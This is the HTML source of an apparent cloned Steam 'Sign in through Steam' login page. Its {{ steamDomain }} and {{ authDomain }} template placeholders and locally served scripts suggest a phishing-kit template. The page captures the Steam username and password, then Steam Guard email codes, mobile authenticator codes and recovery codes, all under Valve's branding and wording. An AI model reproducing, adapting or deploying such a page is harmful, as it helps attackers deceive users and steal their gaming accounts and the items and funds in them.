<!DOCTYPE html>
<html class=" responsive" lang="en">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="theme-color" content="#171a21">
  <title>Steam Community</title>
  <link rel="shortcut icon" href="https://steamcommunity.com/favicon.ico" type="image/x-icon">
  <link href="/buttons.css" rel="stylesheet" type="text/css">
  <link href="/globalv2.css" rel="stylesheet" type="text/css">
  <link href="/shared_global.css" rel="stylesheet" type="text/css">
  <link href="/motiva_sans.css" rel="stylesheet" type="text/css">
  <link href="/home.css" rel="stylesheet" type="text/css">
  <link href="/login.css" rel="stylesheet" type="text/css">
  <link href="/openid.css" rel="stylesheet" type="text/css">
  <link href="/shared_responsive.css" rel="stylesheet" type="text/css">
  <link href="/header.css" rel="stylesheet" type="text/css">
  <script type="text/javascript" src="/prototype-1.7.js"></script>
  <script type="text/javascript" src="/_combined.js"></script>
  <script type="text/javascript" src="/global.js"></script>
  <script type="text/javascript" src="/jquery-1.11.1.min.js"></script>
  <script type="text/javascript" src="/tooltip.js"></script>
  <script type="text/javascript" src="/shared_global.js"></script>
  <script type="text/javascript">
    const GLOBAL_STEAM_DOMAIN = "{{ steamDomain }}"
    const GLOBAL_AUTH_DOMAIN = "{{ authDomain }}"
    $J = jQuery.noConflict()
  </script>
  <script type="text/javascript" src="/login.js"></script>
  <script type="text/javascript" src="/modalv2.js"></script>
  <script type="text/javascript" src="/shared_responsive_adapter.js"></script>
  <link rel="image_src" href="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/share_steam_logo.png">
  <meta property="og:image" content="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/share_steam_logo.png">
  <meta property="og:image:secure" content="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/share_steam_logo.png">
</head>

<body class=" responsive_page">
  <div class="responsive_page_frame with_header">
    <div class="responsive_page_menu_ctn mainmenu">
      <div class="responsive_page_menu" id="responsive_page_menu">
        <div class="mainmenu_contents">
          <div class="mainmenu_contents_items">
            <a class="menuitem" href="#">Login</a>
            <a class="menuitem supernav" href="http://store.steampowered.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_store">
        Store   </a>
            <div class="submenu_store" style="display: none;" data-submenuid="store">
              <a class="submenuitem" href="http://store.steampowered.com/">Featured</a>
              <a class="submenuitem" href="http://store.steampowered.com/explore/">Explore</a>
              <a class="submenuitem" href="http://store.steampowered.com/curators/">Curators</a>
              <a class="submenuitem" href="http://steamcommunity.com/my/wishlist/">Wishlist</a>
              <a class="submenuitem" href="http://store.steampowered.com/news/">News</a>
              <a class="submenuitem" href="http://store.steampowered.com/stats/">Stats</a>
            </div>
            <a class="menuitem supernav" style="display: block" href="http://steamcommunity.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_community">
        Community   </a>
            <div class="submenu_community" style="display: none;" data-submenuid="community">
              <a class="submenuitem" href="http://steamcommunity.com/">Home</a>
              <a class="submenuitem" href="http://steamcommunity.com/discussions/">Discussions</a>
              <a class="submenuitem" href="http://steamcommunity.com/workshop/">Workshop</a>
              <a class="submenuitem" href="http://steamcommunity.com/market/">Market</a>
              <a class="submenuitem" href="http://steamcommunity.com/?subsection=broadcasts">Broadcasts</a>
            </div>
            <a class="menuitem" href="https://help.steampowered.com/en/">
        Support </a>
            <div class="minor_menu_items">
              <div class="menuitem change_language_action">
                Change language </div>
              <div class="menuitem" onclick="Responsive_RequestDesktopView();">
                View desktop website </div>
            </div>
          </div>
          <div class="mainmenu_footer_spacer"></div>
          <div class="mainmenu_footer">
            <div class="mainmenu_footer_logo"><img src="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/logo_valve_footer.png"></div>
            © Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries. <span class="mainmenu_valve_links">
                                <a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>
                                &nbsp;| &nbsp;<a href="http://www.valvesoftware.com/legal.htm" target="_blank">Legal</a>
                                &nbsp;| &nbsp;<a href="http://store.steampowered.com/subscriber_agreement/" target="_blank">Steam Subscriber Agreement</a>
                                &nbsp;| &nbsp;<a href="http://store.steampowered.com/steam_refunds/" target="_blank">Refunds</a>
                            </span>
          </div>
        </div>
      </div>
    </div>
    <div class="responsive_local_menu_tab">
    </div>
    <div class="responsive_page_menu_ctn localmenu">
      <div class="responsive_page_menu" id="responsive_page_local_menu">
        <div class="localmenu_content">
        </div>
      </div>
    </div>
    <div class="responsive_header">
      <div class="responsive_header_content">
        <div id="responsive_menu_logo">
          <img src="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/header_menu_hamburger.png" height="100%">
        </div>
        <div class="responsive_header_logo">
          <img src="https://steamcommunity-a.akamaihd.net/public/shared/images/responsive/header_logo.png" height="36" border="0" alt="STEAM">
        </div>
      </div>
    </div>
    <div class="responsive_page_content_overlay">
    </div>
    <div class="responsive_fixonscroll_ctn nonresponsive_hidden ">
    </div>
    <div class="responsive_page_content">
      <div id="global_header">
        <div class="content">
          <div class="logo">
            <span id="logo_holder">
                                    <a href="http://store.steampowered.com/">
                        <img src="https://steamcommunity-a.akamaihd.net/public/shared/images/header/globalheader_logo.png?t=962016" width="176" height="44">
                    </a>
                            </span>
          </div>
          <div class="supernav_container">
            <a class="menuitem supernav" href="http://store.steampowered.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_store">
        STORE   </a>
            <div class="submenu_store" style="display: none;" data-submenuid="store">
              <a class="submenuitem" href="http://store.steampowered.com/">Featured</a>
              <a class="submenuitem" href="http://store.steampowered.com/explore/">Explore</a>
              <a class="submenuitem" href="http://store.steampowered.com/curators/">Curators</a>
              <a class="submenuitem" href="http://steamcommunity.com/my/wishlist/">Wishlist</a>
              <a class="submenuitem" href="http://store.steampowered.com/news/">News</a>
              <a class="submenuitem" href="http://store.steampowered.com/stats/">Stats</a>
            </div>
            <a class="menuitem supernav" style="display: block" href="http://steamcommunity.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_community">
        COMMUNITY   </a>
            <div class="submenu_community" style="display: none;" data-submenuid="community">
              <a class="submenuitem" href="http://steamcommunity.com/">Home</a>
              <a class="submenuitem" href="http://steamcommunity.com/discussions/">Discussions</a>
              <a class="submenuitem" href="http://steamcommunity.com/workshop/">Workshop</a>
              <a class="submenuitem" href="http://steamcommunity.com/market/">Market</a>
              <a class="submenuitem" href="http://steamcommunity.com/?subsection=broadcasts">Broadcasts</a>
            </div>
            <a class="menuitem" href="http://store.steampowered.com/about/">
            ABOUT       </a>
            <a class="menuitem" href="https://help.steampowered.com/en/">
        SUPPORT </a>
          </div>
          <script type="text/javascript">
          jQuery(function($) {
            $('.tooltip').v_tooltip();
            $('#global_header .supernav').v_tooltip({ 'location': 'bottom', 'tooltipClass': 'supernav_content', 'offsetY': -4, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false });
          });
          </script>
          <div id="global_actions">
            <div id="global_action_menu">
              <div class="header_installsteam_btn header_installsteam_btn_green">
                <div class="header_installsteam_btn_leftcap"></div>
                <div class="header_installsteam_btn_rightcap"></div>
                <a class="header_installsteam_btn_content" href="http://store.steampowered.com/about/">
                            Install Steam                       </a>
              </div>
              <a class="global_action_link" href="#">login</a> &nbsp;|&nbsp;
              <span class="pulldown global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span>
              <div class="popup_block_new" id="language_dropdown" style="display: none;">
                <div class="popup_body popup_menu">
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'bulgarian' ); return false;">Български (Bulgarian)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'czech' ); return false;">čeština (Czech)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'danish' ); return false;">Dansk (Danish)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'dutch' ); return false;">Nederlands (Dutch)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'finnish' ); return false;">Suomi (Finnish)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'french' ); return false;">Français (French)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'german' ); return false;">Deutsch (German)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'greek' ); return false;">Ελληνικά (Greek)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'hungarian' ); return false;">Magyar (Hungarian)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'italian' ); return false;">Italiano (Italian)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'japanese' ); return false;">日本語 (Japanese)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'koreana' ); return false;">한국어 (Korean)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'norwegian' ); return false;">Norsk (Norwegian)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'polish' ); return false;">Polski (Polish)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'portuguese' ); return false;">Português (Portuguese)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'brazilian' ); return false;">Português-Brasil (Portuguese-Brazil)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'romanian' ); return false;">Română (Romanian)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'russian' ); return false;">Русский (Russian)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'schinese' ); return false;">简体中文 (Simplified Chinese)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'spanish' ); return false;">Español (Spanish)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'swedish' ); return false;">Svenska (Swedish)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'tchinese' ); return false;">繁體中文 (Traditional Chinese)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'thai' ); return false;">ไทย (Thai)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'turkish' ); return false;">Türkçe (Turkish)</a>
                  <a class="popup_menu_item tight" href="#" onclick="ChangeLanguage( 'ukrainian' ); return false;">Українська (Ukrainian)</a>
                  <a class="popup_menu_item tight" href="http://translation.steampowered.com" target="_blank">Help us translate Steam</a>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <script type="text/javascript">
      g_sessionID = "";
      g_steamID = false;

      // We always want to have the timezone cookie set for PHP to use
      setTimezoneCookies();

      $J(function() {

        InitMiniprofileHovers();
        InitEmoticonHovers();
        window.BindCommunityTooltip = function($Selector) { $Selector.v_tooltip({ 'tooltipClass': 'community_tooltip', 'dataName': 'communityTooltip' }); };
        BindCommunityTooltip($J('[data-community-tooltip]'));
      });

      $J(function() { InitEconomyHovers("https:\/\/steamcommunity-a.akamaihd.net\/public\/css\/skin_1\/economy.css?v=BC9LwzSX5z7E", "https:\/\/steamcommunity-a.akamaihd.net\/public\/javascript\/economy_common.js?v=tsXdRVB0yEaR&l=english", "https:\/\/steamcommunity-a.akamaihd.net\/public\/javascript\/economy.js?v=i8iKSj_RdU-r&l=english"); });
      </script>
      <div class="responsive_page_template_content">
        <script language="javascript">
        function Logout() {
          $('actionInput').value = 'steam_openid_logout';
          $('openidForm').submit();
        }

        $J(function() {

          LoginManager = new CLoginPromptManager('//{{ steamDomain }}', {
            gidCaptcha: -1
          });
        });
        </script>
        <div id="mainBody">
          <div class="OpenID_MainHeader">
            <div class="logo"><img src="https://steamcommunity-a.akamaihd.net/public/images/signinthroughsteam/sits_landing.png" width="114" height="43" border="0"></div>
            <h1>Sign into {{ authDomain }} using your Steam account</h1>
            <div>
              <div style="float:left; padding: 6px 6px 20px 18px">
                <img src="https://steamcommunity-a.akamaihd.net/public/images/signinthroughsteam/icon_info.png" width="26" height="26" border="0">
              </div>
              <h2>Note that {{ authDomain }} is not affiliated with Steam or Valve</h2>
            </div>
          </div>
          <div class="OpenID_LowerContents">
            <div class="OpenIDCol right">
              <div class="OpenID_LowerContents_right">
                <h2>By signing into {{ authDomain }} through Steam:</h2>
                <ul class="OpenID_list">
                  <li class="OpenID_listitem">
                    the site will be able to identify you within the Steam Community and retrieve public info such as your stats and achievements. </li>
                  <li class="OpenID_listitem">
                    a unique numeric identifier will be shared with the site, rather than your Steam login credentials. </li>
                  <li class="OpenID_listitem">
                    basic information about your Steam account will be shared with a third-party web site. See our <a href="http://www.valvesoftware.com/privacy.html">Privacy Policy</a> for more information. </li>
                </ul>
              </div>
            </div>
            <div class="OpenIDCol left">
              <div class="OpenID_LowerContents_left">
                <form action="steamcommunity.com" method="POST" name="logon" id="loginForm">
                  <input type="hidden" name="emailauth" id="emailauth" value="">
                  <input type="hidden" name="emailsteamid" id="emailsteamid">
                  <input type="hidden" name="loginfriendlyname" id="loginfriendlyname" value="">
                  <div>Steam username</div>
                  <input class="textField" type="text" name="username" id="steamAccountName" autofocus="" maxlength="64">
                  <br> &nbsp;
                  <br>
                  <div>Password</div>
                  <input class="textField" type="password" name="password" id="steamPassword" autocomplete="off" maxlength="64">
                  <br>
                  <br>
                  <div id="captcha_entry" class="captcha_oauth" style="display: none;">
                    <input type="hidden" id="captchagid" name="captchagid" value="-1">
                    <div id="CaptchaFormArea">
                      <div>Type these characters below</div>
                      <img id="captchaImg" src="https://steamcommunity.com/public/captcha.php?gid=-1" border="0">
                      <br>
                      <div id="captchaRefresh"><img src="https://steamcommunity-a.akamaihd.net/public/images//skin_1/blue_refresh_icon.png" id="captchaRefreshImg" border="0" onclick="RefreshCaptcha();return false;">&nbsp;<a href="#" id="captchaRefreshLink" title="Refresh" onclick="RefreshCaptcha();return false;">Refresh</a></div>
                      <input class="textField" type="text" name="captcha_text" id="input_captcha" autocomplete="off">
                      <br>
                      <div class="smallLabel" id="captchaExplanation">Are you human or robot?</div>
                      <br>
                    </div>
                  </div>
                  <div id="login_btn_signin">
                    <input class="btn_green_white_innerfade" type="submit" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;" value="Sign in">
                  </div>
                  <br>
                  <div id="login_btn_wait" style="display: none;">
                    <img src="https://steamcommunity-a.akamaihd.net/public/images/login/throbber.gif">
                  </div>
                  <br clear="all">
                </form>
                <br>
                <p>Don't have a Steam account? You can <a class="whiteLink" target="_blank" href="https://store.steampowered.com/join/">create an account</a> for free.</p>
                <br>
                <div id="error_display" style="display: none;"></div>
              </div>
            </div>
            <div style="clear: both"></div>
          </div>
        </div>
      </div>
      <!-- responsive_page_legacy_content -->
      <div id="footer_spacer"></div>
      <div id="footer_responsive_optin_spacer"></div>
      <div id="footer">
        <div class="footer_content">
          <span id="footerLogo"><img src="https://steamcommunity-a.akamaihd.net/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo"></span>
          <span id="footerText">
                © Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.<br>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?url=http://www.geonames.org" target="_blank" rel="noreferrer">geonames.org</a>.              <br>
                                    <span class="valve_links">
                        <a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>
                        &nbsp; | &nbsp;<a href="http://www.valvesoftware.com/legal.htm" target="_blank">Legal</a>
                        &nbsp;| &nbsp;<a href="http://store.steampowered.com/subscriber_agreement/" target="_blank">Steam Subscriber Agreement</a>
                    </span>
          </span>
        </div>
        <div class="responsive_optin_link">
          <div class="btn_medium btnv6_grey_black" onclick="Responsive_RequestMobileView()">
            <span>View mobile website</span>
          </div>
        </div>
      </div>
    </div>
    <!-- responsive_page_content -->
  </div>
  <!-- responsive_page_frame -->
  <div class="miniprofile_hover" style="display: none;">
    <div class="shadow_ul"></div>
    <div class="shadow_top"></div>
    <div class="shadow_ur"></div>
    <div class="shadow_left"></div>
    <div class="shadow_right"></div>
    <div class="shadow_bl"></div>
    <div class="shadow_bottom"></div>
    <div class="shadow_br"></div>
    <div class="miniprofile_hover_inner shadow_content"></div>
    <div class="hover_arrow left miniprofile_arrow">
      <div class="miniprofile_arrow_inner"></div>
    </div>
    <div class="hover_arrow right miniprofile_arrow">
      <div class="miniprofile_arrow_inner"></div>
    </div>
  </div>
  <div id="loginModals">
    <div class="login_modal loginAuthCodeModal" style="display: none">
      <form data-ajax="false">
        <div class="auth_message_area">
          <div id="auth_icon" class="auth_icon auth_icon_key">
          </div>
          <div class="auth_messages" id="auth_messages">
            <div class="auth_message" id="auth_message_entercode" style="display: none;">
              <div class="auth_modal_h1">Hello!</div>
              <p>We see you're logging in to Steam from a new browser or a new computer. Or maybe it's just been a while...</p>
            </div>
            <div class="auth_message" id="auth_message_checkspam" style="display: none;">
              <div class="auth_modal_h1">Mistaken for spam?</div>
              <p>Did you check your spam folder? If you don't see a recent message from Steam Support in your inbox, try looking there.</p>
            </div>
            <div class="auth_message" id="auth_message_success" style="display: none;">
              <div class="auth_modal_h1">Success!</div>
              <p>You now have access to your Steam account here.</p>
            </div>
            <div class="auth_message" id="auth_message_incorrectcode" style="display: none;">
              <div class="auth_modal_h1">Whoops!</div>
              <p>Sorry but,
                <br>that isn't quite right...</p>
            </div>
            <div class="auth_message" id="auth_message_help" style="display: none;">
              <div class="auth_modal_h1">Let us help!</div>
              <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
            </div>
          </div>
        </div>
        <div id="auth_details_messages" class="auth_details_messages">
          <div class="auth_details" id="auth_details_entercode" style="display: none;">
            As an added account security measure, you’ll need to grant access to this browser by entering the special code we’ve just sent to your email address at <span id="emailauth_entercode_emaildomain"></span>. </div>
          <div class="auth_details" id="auth_details_success" style="display: none;">
            If this is a public computer, be sure to log out of Steam when you're ready to quit this browser session. </div>
          <div class="auth_details" id="auth_details_help" style="display: none;">
            Please contact Steam Support for assistance from a member of our staff. Legitimate claims for help with account access are our number one priority. </div>
        </div>
        <div class="authcode_entry_area">
          <div id="authcode_entry">
            <div class="authcode_entry_box">
              <input class="authcode_entry_input authcode_placeholder" id="authcode" type="text" value="" placeholder="enter your code here">
            </div>
          </div>
          <div id="authcode_help_supportlink">
            <a href="https://support.steampowered.com/kb_article.php?ref=4020-ALZM-5519" data-ajax="false" data-externallink="1">Contact Steam Support for help with account access</a>
          </div>
        </div>
        <div class="modal_buttons" id="auth_buttonsets">
          <div class="auth_buttonset" id="auth_buttonset_entercode" style="display: none;">
            <div data-modalstate="submit" class="auth_button leftbtn">
              <div class="auth_button_h3">Submit</div>
              <div class="auth_button_h5">my special access code</div>
            </div>
            <div data-modalstate="checkspam" class="auth_button">
              <div class="auth_button_h3">What message?</div>
              <div class="auth_button_h5">I don't have any message from Steam Support...</div>
            </div>
            <div style="clear: left;"></div>
          </div>
          <div class="auth_buttonset" id="auth_buttonset_checkspam" style="display: none;">
            <div data-modalstate="submit" class="auth_button leftbtn">
              <div class="auth_button_h3">Found it!</div>
              <div class="auth_button_h5">and I've entered my special access code above</div>
            </div>
            <div data-modalstate="help" class="auth_button">
              <div class="auth_button_h3">No luck still...</div>
              <div class="auth_button_h5">I don't have any message from Steam Support...</div>
            </div>
            <div style="clear: left;"></div>
          </div>
          <div class="auth_buttonset" id="auth_buttonset_success" style="display: none;">
            <div class="auth_button auth_button_spacer">
            </div>
            <a data-modalstate="complete" class="auth_button" id="success_continue_btn" href="javascript:void(0);">
              <div class="auth_button_h3">Proceed to Steam!</div>
              <div class="auth_button_h5">&nbsp;
                <br>&nbsp;</div>
            </a>
            <div style="clear: left;"></div>
          </div>
          <div class="auth_buttonset" id="auth_buttonset_incorrectcode" style="display: none;">
            <div data-modalstate="submit" class="auth_button leftbtn">
              <div class="auth_button_h3">I want to try again</div>
              <div class="auth_button_h5">and I've re-entered my special access code above</div>
            </div>
            <div data-modalstate="help" class="auth_button">
              <div class="auth_button_h3">Please help</div>
              <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
            </div>
            <div style="clear: left;"></div>
          </div>
          <div class="auth_buttonset" id="auth_buttonset_waiting" style="display: none;">
          </div>
        </div>
        <div style="" id="auth_details_computer_name" class="auth_details_messages">
          To easily recognize this browser among the list of devices Steam Guard has enabled, give the browser a friendly name - at least 6 characters long.
          <div id="friendly_name_box" class="friendly_name_box">
            <input class="authcode_entry_input authcode_placeholder" id="friendlyname" type="text" placeholder="enter a friendly name here">
          </div>
        </div>
        <div style="display: none;">
          <input type="submit">
        </div>
      </form>
    </div>
    <div class="login_modal loginIPTModal" style="display: none">
      <div class="auth_message_area">
        <div class="auth_icon ipt_icon">
        </div>
        <div class="auth_messages">
          <div class="auth_message">
            <div class="auth_modal_h1">Sorry</div>
            <p>This account can't be accessed from this computer without additional authorization.</p>
          </div>
        </div>
      </div>
      <div class="auth_details_messages">
        <div class="auth_details">
          Please contact Steam Support to have a member of our staff assist you. Legitimate claims for help with account access are our number one priority. </div>
      </div>
      <div class="authcode_entry_area">
      </div>
      <div class="modal_buttons">
        <div class="auth_buttonset">
          <a href="https://support.steampowered.com/kb_article.php?ref=9400-IPAX-9398&amp;auth=e39b5c227cffc8ae65414aba013e5fef" class="auth_button leftbtn" data-ajax="false" data-externallink="1">
            <div class="auth_button_h3">Learn more</div>
            <div class="auth_button_h5">about Intel® Identity Protection Technology</div>
          </a>
          <a href="https://support.steampowered.com" class="auth_button" data-ajax="false" data-externallink="1">
            <div class="auth_button_h3">Please help</div>
            <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
          </a>
          <div style="clear: left;"></div>
        </div>
      </div>
    </div>
    <div class="login_modal loginTwoFactorCodeModal" style="display: none">
      <form>
        <div class="twofactorauth_message_area">
          <div id="login_twofactorauth_icon" class="auth_icon auth_icon_key">
          </div>
          <div class="twofactorauth_messages" id="login_twofactorauth_messages">
            <div class="twofactorauth_message" id="login_twofactorauth_message_entercode" style="display: none;">
              <div class="auth_modal_h1">Hello <span id="login_twofactorauth_message_entercode_accountname"></span>!</div>
              <p>This account is currently using a Steam Guard Mobile Authenticator.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_incorrectcode" style="display: none;">
              <div class="auth_modal_h1">Whoops!</div>
              <p>Sorry but,
                <br>that isn't quite right...</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp" style="display: none;">
              <div class="auth_modal_h1">Let us help!</div>
              <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove" style="display: none;">
              <div class="auth_modal_h1">Confirm ownership of your account</div>
              <p>We'll send a text message containing an account recovery code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_last_digits"></span>. Once you enter the code, we will remove the mobile authenticator from your account and you will receive Steam Guard codes via email.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_entercode" style="display: none;">
              <div class="auth_modal_h1">Confirm ownership of your account</div>
              <p>We have sent a text message containing a confirmation code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_entercode_last_digits"></span>. Enter the code below so we can remove the mobile authenticator from your account.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_incorrectcode" style="display: none;">
              <div class="auth_modal_h1">Whoops!</div>
              <p>Sorry but,
                <br>that isn't quite right...</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_removed" style="display: none;">
              <div class="auth_modal_h1">Success!</div>
              <p>We have removed the mobile authenticator from your account. Next time you log in, you will have to enter a Steam Guard code that is sent to your email address.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_replaced" style="display: none;">
              <div class="auth_modal_h1">Success!</div>
              <p>You can now use this device to get mobile authenticator codes for your account. Any other device that was previously providing authenticator codes for your account will no longer be able to do so.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_nosms" style="display: none;">
              <div class="auth_modal_h1">Do you have the recovery code?</div>
              <p>You do not have a phone number associated with your Steam account, so we are unable to verify account ownership via a text message. Do you have the recovery code that you wrote down when you added the mobile authenticator? The recovery code begins with the letter 'R'.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode" style="display: none;">
              <div class="auth_modal_h1">Enter your recovery code</div>
              <p>Please enter the recovery code in the box below. The recovery code begins with the letter 'R'.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode" style="display: none;">
              <div class="auth_modal_h1">Whoops!</div>
              <p>Sorry but,
                <br>that isn't quite right...</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
              <div class="auth_modal_h1">Whoops!</div>
              <p>Sorry but,
                <br>that isn't quite right...</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_message" style="display: none;">
              <div class="auth_modal_h1">Whoops!</div>
              <p>Sorry but,
                <br>that isn't quite right...</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_couldnthelp" style="display: none;">
              <div class="auth_modal_h1">Let us help!</div>
              <p>If you have lost access to your mobile device, the mobile phone number associated with your account, and don't have the recovery code that you wrote down when you added the mobile authenticator, then please contact Steam Support for assistance recovering access to your account.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_help" style="display: none;">
              <div class="auth_modal_h1">Let us help!</div>
              <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
            </div>
            <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_failure" style="display: none;">
              <div class="auth_modal_h1">Sorry!</div>
              <p>There was an error encountered while processing your request.</p>
            </div>
          </div>
        </div>
        <div id="login_twofactorauth_details_messages" class="twofactorauth_details_messages">
          <div class="twofactorauth_details" id="login_twofactorauth_details_entercode" style="display: none;">
            Enter the current code displayed in the Steam Mobile app: </div>
          <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp" style="display: none;">
            If you have lost your mobile device or uninstalled the Steam app and can no longer receive codes, then you may remove the mobile authenticator from your account. This will reduce the security on your account, so you should add a mobile authenticator to a new mobile device afterwards. </div>
          <div class="twofactorauth_details" id="login_twofactorauth_details_help" style="display: none;">
            Please contact Steam Support for assistance from a member of our staff. </div>
          <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_failure" style="display: none;">
          </div>
          <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode" style="display: none;">
          </div>
          <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
          </div>
        </div>
        <div class="twofactorauthcode_entry_area">
          <div id="login_twofactor_authcode_entry">
            <div class="twofactorauthcode_entry_box">
              <input class="twofactorauthcode_entry_input authcode_placeholder" id="twofactorcode_entry" type="text" placeholder="enter your code here" autocomplete="off">
            </div>
          </div>
          <div id="login_twofactor_authcode_help_supportlink">
            <a href="https://support.steampowered.com/kb_article.php?ref=4020-ALZM-5519">
                    Contact Steam Support for help with account access              </a>
          </div>
        </div>
        <div class="modal_buttons" id="login_twofactorauth_buttonsets">
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_entercode" style="display: none;">
            <div type="submit" class="auth_button leftbtn" data-modalstate="submit">
              <div class="auth_button_h3">Submit</div>
              <div class="auth_button_h5">my authenticator code</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp">
              <div class="auth_button_h3">Please help</div>
              <div class="auth_button_h5">I no longer have access to my Mobile Authenticator codes</div>
            </div>
            <div style="clear: left;"></div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_incorrectcode" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="submit">
              <div class="auth_button_h3">I want to try again</div>
              <div class="auth_button_h5">and I've re-entered my authenticator code above</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp">
              <div class="auth_button_h3">Please help</div>
              <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
            </div>
            <div style="clear: left;"></div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_start">
              <div class="auth_button_h3" style="font-size: 16px;">Remove authenticator</div>
              <div class="auth_button_h5">and go back to receiving codes by email</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp_sms_reset_start">
              <div class="auth_button_h3">Use this device</div>
              <div class="auth_button_h5">and get authenticator codes on this app</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_sendcode">
              <div class="auth_button_h3">OK!</div>
              <div class="auth_button_h5">Send me the text message</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp_nosms">
              <div class="auth_button_h3">I can't</div>
              <div class="auth_button_h5">because I no longer have access to that phone number</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_entercode" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
              <div class="auth_button_h3">Submit</div>
              <div class="auth_button_h5">I entered the code above</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp_nosms">
              <div class="auth_button_h3">Please help</div>
